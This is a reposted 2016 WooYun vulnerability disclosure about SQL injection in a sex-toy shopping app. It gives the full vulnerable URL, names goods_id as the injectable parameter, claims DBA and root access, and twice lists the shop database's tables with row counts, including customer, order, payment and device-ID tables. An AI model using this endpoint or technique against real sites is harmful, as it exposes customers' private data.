某情趣appSQL注入涉及大量商城信息(dba权限+root)

admin
admin
admin
140488
文章
117
评论
2017年3月27日23:48:28评论351 views字数 228阅读0分45秒阅读模式
摘要

2016-03-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-06: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(11) 关注此漏洞

缺陷编号: WooYun-2016-187555

漏洞标题: 某情趣appSQL注入涉及大量商城信息(dba权限+root)

相关厂商: 火热网络商城

漏洞作者: DeadSea

提交时间: 2016-03-22 09:48

公开时间: 2016-05-06 09:48

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏

漏洞详情

披露状态:

2016-03-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

听说情趣用品都走大厂商~~

详细说明:

code 区域 
http://shop.hot-3w.com/sweet/ai/goods.php?imsi=460008832642241&imei=866654024251636&lcd=1152%C3%971920&view_width=1152.0&view_height=1920.0&cid=174350851&lac=10034&mcc=460&mnc=0&pf=666070401&format=json&no=i0000217&versionCode=67&versionName=V2.6.7&goods_id=2472

goods_id参数存在注入

某情趣appSQL注入涉及大量商城信息(dba权限+root)

root权限

某情趣appSQL注入涉及大量商城信息(dba权限+root)

dba

某情趣appSQL注入涉及大量商城信息(dba权限+root)

数据

某情趣appSQL注入涉及大量商城信息(dba权限+root)

code 区域 
Database: hs_shop
 +-------------------------------------+---------+
 | Table                               | Entries |
 +-------------------------------------+---------+
 | ecs_stats                           | 279166732 |
 | ecs_stats_version                   | 179057603 |
 | ecs_date_visit                      | 5909839 |
 | ecs_pf_retention_rate_stats         | 5532830 |
 | ecs_imsi_imei                       | 2265449 |
 | ecs_visit_imei                      | 2258961 |
 | ecs_gold                            | 2135532 |
 | ecs_consumer_photo_score            | 1482439 |
 | ecs_visit_imei_bak                  | 1167348 |
 | ecs_community_private_letter        | 659398  |
 | ecs_community                       | 562980  |
 | ecs_retention_rate_stats            | 519615  |
 | ecs_retention_rate_stats_bak        | 185136  |
 | ecs_consumer_check_log              | 162840  |
 | ecs_order_action                    | 151696  |
 | ecs_consumer                        | 133147  |
 | ecs_community_user                  | 132478  |
 | ecs_community_gallery               | 104496  |
 | ecs_order_goods                     | 97106   |
 | ecs_invoicing                       | 94700   |
 | ecs_community_private_letter_status | 94486   |
 | ecs_community_reply_delete_time     | 79427   |
 | ecs_consumer_photo_score_date       | 79275   |
 | ecs_click_category_stats            | 67285   |
 | ecs_order_stock_goods               | 63084   |
 | ecs_click_add                       | 59086   |
 | ecs_order_info                      | 57622   |
 | ecs_consumer_info                   | 53792   |
 | ecs_delivery_goods                  | 53687   |
 | ecs_onlinepay_log                   | 43242   |
 | ecs_stats_hack_data                 | 38576   |
 | ecs_consumer_fans                   | 32967   |
 | ecs_rose                            | 32565   |
 | ecs_code                            | 30257   |
 | ecs_delivery_order                  | 26228   |
 | ecs_order_analysis                  | 24081   |
 | ecs_consumer_photo_score_week       | 19644   |
 | ecs_buyer_tel                       | 17272   |
 | ecs_goods_article                   | 15785   |
 | ecs_admin_log                       | 13539   |
 | ecs_link_goods                      | 12915   |
 | ecs_pay_log                         | 12687   |
 | ecs_keywords                        | 12514   |
 | ecs_wish_reply                      | 11179   |
 | ecs_original_goods                  | 9764    |
 | ecs_sessions_data                   | 9023    |
 | ecs_client_status                   | 9009    |
 | ecs_auto_manage                     | 8896    |
 | ecs_back_goods                      | 6519    |
 | ecs_goods_gallery                   | 6465    |
 | ecs_save_ali                        | 6429    |
 | ecs_article                         | 6423    |
 | ecs_link_ads_goods                  | 5579    |
 | ecs_consumer_photo                  | 5040    |
 | ecs_sessions                        | 3816    |
 | ecs_region                          | 3410    |
 | ecs_back_order                      | 3325    |
 | ecs_link_stockgoods                 | 2964    |
 | ecs_message                         | 2916    |
 | ecs_community_to_report             | 2848    |
 | ecs_stock                           | 2829    |
 | ecs_goods                           | 2381    |
 | ecs_temp_sales                      | 2196    |
 | ecs_goods_cat                       | 2189    |
 | ecs_wish                            | 2031    |
 | ecs_goods_attr                      | 1928    |
 | ecs_order_false_delete              | 1900    |
 | ecs_jrtj_log                        | 1394    |
 | ecs_comment                         | 1038    |
 | ecs_added_uv                        | 1019    |
 | ecs_goods_test                      | 983     |
 | ecs_searchengine                    | 894     |
 | ecs_added_uv_bak                    | 645     |
 | test_stock                          | 510     |
 | invoicing_test                      | 307     |
 | ecs_ads_goods                       | 217     |
 | ecs_shop_config                     | 185     |
 | ecs_admin_action                    | 146     |
 | ecs_users                           | 107     |
 | ecs_micro_currency_log              | 100     |
 | ecs_account_log                     | 62      |
 | ecs_category                        | 58      |
 | ecs_original_suppliers              | 49      |
 | ecs_area_region                     | 36      |
 | ecs_shipping_area                   | 36      |
 | ecs_shipping_fee                    | 36      |
 | ecs_pf_info                         | 35      |
 | ecs_nav                             | 32      |
 | ecs_save_yeepay                     | 31      |
 | ecs_admin_user                      | 24      |
 | ecs_template                        | 22      |
 | ecs_article_cat                     | 21      |
 | ecs_cat_recommend                   | 17      |
 | ecs_brand                           | 14      |
 | ecs_mail_templates                  | 14      |
 | ecs_apps_recommend                  | 10      |
 | ecs_test                            | 10      |
 | ecs_user_address                    | 10      |
 | ecs_user_bonus                      | 10      |
 | ecs_suppliers                       | 9       |
 | ecs_order_product                   | 8       |
 | ecs_bank                            | 7       |
 | ecs_attribute                       | 6       |
 | ecs_goods_type                      | 6       |
 | ecs_package_goods                   | 6       |
 | ecs_payment                         | 6       |
 | ecs_reg_fields                      | 6       |
 | ecs_user_account                    | 6       |
 | ecs_volume_price                    | 5       |
 | ecs_bonus_type                      | 4       |
 | ecs_friend_link                     | 4       |
 | ecs_user_rank                       | 3       |
 | ecs_vote_option                     | 3       |
 | ecs_website_app                     | 3       |
 | synchronize_upside                  | 3       |
 | user_status_report                  | 3       |
 | ecs_exchange_goods                  | 2       |
 | ecs_snatch_log                      | 2       |
 | ecs_test02                          | 2       |
 | ecs_topic                           | 2       |
 | ecs_ad                              | 1       |
 | ecs_adsense                         | 1       |
 | ecs_app_info                        | 1       |
 | ecs_auction_log                     | 1       |
 | ecs_crons                           | 1       |
 | ecs_favourable_activity             | 1       |
 | ecs_goods_activity                  | 1       |
 | ecs_push_info                       | 1       |
 | ecs_shipping                        | 1       |
 | ecs_version_updates                 | 1       |
 | ecs_vote                            | 1       |
 | ecs_wholesale                       | 1       |
 +-------------------------------------+---------+

漏洞证明:

code 区域 
Database: hs_shop
 +-------------------------------------+---------+
 | Table                               | Entries |
 +-------------------------------------+---------+
 | ecs_stats                           | 279166732 |
 | ecs_stats_version                   | 179057603 |
 | ecs_date_visit                      | 5909839 |
 | ecs_pf_retention_rate_stats         | 5532830 |
 | ecs_imsi_imei                       | 2265449 |
 | ecs_visit_imei                      | 2258961 |
 | ecs_gold                            | 2135532 |
 | ecs_consumer_photo_score            | 1482439 |
 | ecs_visit_imei_bak                  | 1167348 |
 | ecs_community_private_letter        | 659398  |
 | ecs_community                       | 562980  |
 | ecs_retention_rate_stats            | 519615  |
 | ecs_retention_rate_stats_bak        | 185136  |
 | ecs_consumer_check_log              | 162840  |
 | ecs_order_action                    | 151696  |
 | ecs_consumer                        | 133147  |
 | ecs_community_user                  | 132478  |
 | ecs_community_gallery               | 104496  |
 | ecs_order_goods                     | 97106   |
 | ecs_invoicing                       | 94700   |
 | ecs_community_private_letter_status | 94486   |
 | ecs_community_reply_delete_time     | 79427   |
 | ecs_consumer_photo_score_date       | 79275   |
 | ecs_click_category_stats            | 67285   |
 | ecs_order_stock_goods               | 63084   |
 | ecs_click_add                       | 59086   |
 | ecs_order_info                      | 57622   |
 | ecs_consumer_info                   | 53792   |
 | ecs_delivery_goods                  | 53687   |
 | ecs_onlinepay_log                   | 43242   |
 | ecs_stats_hack_data                 | 38576   |
 | ecs_consumer_fans                   | 32967   |
 | ecs_rose                            | 32565   |
 | ecs_code                            | 30257   |
 | ecs_delivery_order                  | 26228   |
 | ecs_order_analysis                  | 24081   |
 | ecs_consumer_photo_score_week       | 19644   |
 | ecs_buyer_tel                       | 17272   |
 | ecs_goods_article                   | 15785   |
 | ecs_admin_log                       | 13539   |
 | ecs_link_goods                      | 12915   |
 | ecs_pay_log                         | 12687   |
 | ecs_keywords                        | 12514   |
 | ecs_wish_reply                      | 11179   |
 | ecs_original_goods                  | 9764    |
 | ecs_sessions_data                   | 9023    |
 | ecs_client_status                   | 9009    |
 | ecs_auto_manage                     | 8896    |
 | ecs_back_goods                      | 6519    |
 | ecs_goods_gallery                   | 6465    |
 | ecs_save_ali                        | 6429    |
 | ecs_article                         | 6423    |
 | ecs_link_ads_goods                  | 5579    |
 | ecs_consumer_photo                  | 5040    |
 | ecs_sessions                        | 3816    |
 | ecs_region                          | 3410    |
 | ecs_back_order                      | 3325    |
 | ecs_link_stockgoods                 | 2964    |
 | ecs_message                         | 2916    |
 | ecs_community_to_report             | 2848    |
 | ecs_stock                           | 2829    |
 | ecs_goods                           | 2381    |
 | ecs_temp_sales                      | 2196    |
 | ecs_goods_cat                       | 2189    |
 | ecs_wish                            | 2031    |
 | ecs_goods_attr                      | 1928    |
 | ecs_order_false_delete              | 1900    |
 | ecs_jrtj_log                        | 1394    |
 | ecs_comment                         | 1038    |
 | ecs_added_uv                        | 1019    |
 | ecs_goods_test                      | 983     |
 | ecs_searchengine                    | 894     |
 | ecs_added_uv_bak                    | 645     |
 | test_stock                          | 510     |
 | invoicing_test                      | 307     |
 | ecs_ads_goods                       | 217     |
 | ecs_shop_config                     | 185     |
 | ecs_admin_action                    | 146     |
 | ecs_users                           | 107     |
 | ecs_micro_currency_log              | 100     |
 | ecs_account_log                     | 62      |
 | ecs_category                        | 58      |
 | ecs_original_suppliers              | 49      |
 | ecs_area_region                     | 36      |
 | ecs_shipping_area                   | 36      |
 | ecs_shipping_fee                    | 36      |
 | ecs_pf_info                         | 35      |
 | ecs_nav                             | 32      |
 | ecs_save_yeepay                     | 31      |
 | ecs_admin_user                      | 24      |
 | ecs_template                        | 22      |
 | ecs_article_cat                     | 21      |
 | ecs_cat_recommend                   | 17      |
 | ecs_brand                           | 14      |
 | ecs_mail_templates                  | 14      |
 | ecs_apps_recommend                  | 10      |
 | ecs_test                            | 10      |
 | ecs_user_address                    | 10      |
 | ecs_user_bonus                      | 10      |
 | ecs_suppliers                       | 9       |
 | ecs_order_product                   | 8       |
 | ecs_bank                            | 7       |
 | ecs_attribute                       | 6       |
 | ecs_goods_type                      | 6       |
 | ecs_package_goods                   | 6       |
 | ecs_payment                         | 6       |
 | ecs_reg_fields                      | 6       |
 | ecs_user_account                    | 6       |
 | ecs_volume_price                    | 5       |
 | ecs_bonus_type                      | 4       |
 | ecs_friend_link                     | 4       |
 | ecs_user_rank                       | 3       |
 | ecs_vote_option                     | 3       |
 | ecs_website_app                     | 3       |
 | synchronize_upside                  | 3       |
 | user_status_report                  | 3       |
 | ecs_exchange_goods                  | 2       |
 | ecs_snatch_log                      | 2       |
 | ecs_test02                          | 2       |
 | ecs_topic                           | 2       |
 | ecs_ad                              | 1       |
 | ecs_adsense                         | 1       |
 | ecs_app_info                        | 1       |
 | ecs_auction_log                     | 1       |
 | ecs_crons                           | 1       |
 | ecs_favourable_activity             | 1       |
 | ecs_goods_activity                  | 1       |
 | ecs_push_info                       | 1       |
 | ecs_shipping                        | 1       |
 | ecs_version_updates                 | 1       |
 | ecs_vote                            | 1       |
 | ecs_wholesale                       | 1       |
 +-------------------------------------+---------+

修复方案:

版权声明:转载请注明来源 DeadSea@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-03-22 09:57 | Zhe ( 普通白帽子 | Rank:2126 漏洞数:456 | 移动电源跟手环已绕地球一圈,能不能换别的)

    2

    丧心病狂

  2. 2016-03-22 15:21 | Xenon ( 普通白帽子 | Rank:134 漏洞数:42 | 爱XXOO真是太好了)

    1

    丧心病狂

  3. 2016-03-22 16:38 | k0_pwn ( 普通白帽子 | Rank:202 漏洞数:17 | 专注且自由)

    1

    师傅66666

  4. 2016-03-22 17:32 | DeadSea ( 普通白帽子 | Rank:284 漏洞数:63 | 本人外形俊朗、眉清目秀、玉树临风、有明星...)

    1

    _pwn

  5. 2016-03-22 17:52 | k0_pwn ( 普通白帽子 | Rank:202 漏洞数:17 | 专注且自由)

    1

    @DeadSea 哈哈,表哥好!

  6. 2016-03-22 18:33 | 90Snake ( 普通白帽子 | Rank:167 漏洞数:53 | 人如果没有梦想,跟咸鱼有什么分别)

    1

    丧心病狂

  7. 2016-03-22 23:32 | JGHOOluwa ( 普通白帽子 | Rank:556 漏洞数:88 | 就是来看看大牛们如何超神的^-^)

    1

    丧(gan)心(de)病(piao)狂(liang)

  8. 2016-03-25 15:56 | 立志成为厨神的男人 ( 路人 | Rank:15 漏洞数:1 | 我饿了)

    1

    和我的目标相当吻合 丧失

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin